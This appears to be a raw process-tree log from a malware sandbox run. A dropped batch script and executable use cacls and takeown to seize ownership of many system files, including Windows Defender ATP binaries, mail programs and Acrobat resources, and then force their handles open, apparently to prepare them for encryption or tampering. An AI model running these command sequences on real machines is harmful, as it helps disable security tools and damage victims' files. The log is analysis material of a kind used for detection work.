C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db""2⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db" /E /G Admin:F /C3⤵PID:4640
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr.db"3⤵
- Modifies file permissions
PID:4668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "qmgr.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "qmgr.db" -nobanner4⤵
- Executes dropped EXE
PID:4776
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4800
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db""2⤵PID:5084
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SmsInterceptStore.db" -nobanner3⤵PID:2980
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SmsInterceptStore.db" -nobanner4⤵
- Executes dropped EXE
PID:4164
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4296
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:4360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:4140
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:4692
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "WinMail.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4704
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""2⤵PID:4688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C3⤵PID:4552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3804
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "manifest.json" -nobanner3⤵PID:1508
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "manifest.json" -nobanner4⤵
- Executes dropped EXE
PID:4364
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4824
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:4816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:4872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wabmig.exe" -nobanner3⤵PID:4892
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "wabmig.exe" -nobanner4⤵
- Executes dropped EXE
PID:4836
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:4992
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:2520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "wab.exe" -nobanner3⤵PID:2504
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "wab.exe" -nobanner4⤵
- Executes dropped EXE
PID:1680
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""2⤵PID:980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C3⤵PID:672
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"3⤵
- Modifies file permissions
PID:4380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "classes.jsa" -nobanner3⤵PID:4488
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "classes.jsa" -nobanner4⤵
- Executes dropped EXE
PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:252
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:4416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:4780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4772
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe""2⤵PID:4396
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe" /E /G Admin:F /C3⤵PID:4612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SenseSampleUploader.exe" -nobanner3⤵PID:5004
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SenseSampleUploader.exe" -nobanner4⤵
- Executes dropped EXE
PID:4984
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4576
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""2⤵PID:4868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C3⤵PID:4184
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "BrowserCore.exe" -nobanner3⤵PID:5044
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "BrowserCore.exe" -nobanner4⤵
- Executes dropped EXE
PID:3792
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:4156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:4948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:576
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "WinMail.exe" -nobanner3⤵PID:4168
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "WinMail.exe" -nobanner4⤵
- Executes dropped EXE
PID:248
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:260
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe""2⤵PID:4128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" /E /G Admin:F /C3⤵PID:4436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3824
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "MsSense.exe" -nobanner3⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "MsSense.exe" -nobanner4⤵
- Executes dropped EXE
PID:4340
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4216
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4500
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:4988
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4584
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4820
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4840
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:5040
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4072
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4112
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:4632
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:4544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Workflow.Targets" -nobanner4⤵
- Executes dropped EXE
PID:4160
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:5112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:4592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:4588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:4496
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "msoeres.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4556
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""2⤵PID:4976
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C3⤵PID:2400
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "BrowserCore.exe.mui" -nobanner3⤵PID:276
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "BrowserCore.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4804
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4100
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui""2⤵PID:4672
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" /E /G Admin:F /C3⤵PID:5088
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "MsSense.exe.mui" -nobanner3⤵PID:4848
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "MsSense.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:2592
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4860
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:4104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4768
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe""2⤵PID:4676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" /E /G Admin:F /C3⤵PID:2596
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe"3⤵
- Modifies file permissions
PID:5080
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "SenseCncProxy.exe" -nobanner3⤵PID:4108
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "SenseCncProxy.exe" -nobanner4⤵
- Executes dropped EXE
PID:4504
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:4880
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:4844
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:4928
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "ImagingDevices.exe" -nobanner4⤵
- Executes dropped EXE
PID:4536
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:256
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""2⤵PID:4356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C3⤵PID:5108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"3⤵
- Modifies file permissions
PID:4696
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Identity-H" -nobanner3⤵PID:5096
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Identity-H" -nobanner4⤵
- Executes dropped EXE
PID:4220
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4912
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵PID:4348
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:4608
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"3⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:4712
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵
- Executes dropped EXE
PID:4960
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4452
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:4476
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:5024
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:4528
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:4972
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4956
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:2500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V""2⤵PID:4188
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:4920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
PID:5092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "Identity-V" -nobanner3⤵PID:4616
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "Identity-V" -nobanner4⤵
- Executes dropped EXE
PID:268
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:4908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:5072
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵
- Modifies file permissions
PID:4808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c UxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:4864
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵
- Executes dropped EXE
PID:4596
-
-
-
C:\Users\Admin\AppData\Local\Temp\UxaXqOSf.exeUxaXqOSf.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:4332
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DLp1Amrl.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Data.bin""2⤵PID:5104
-
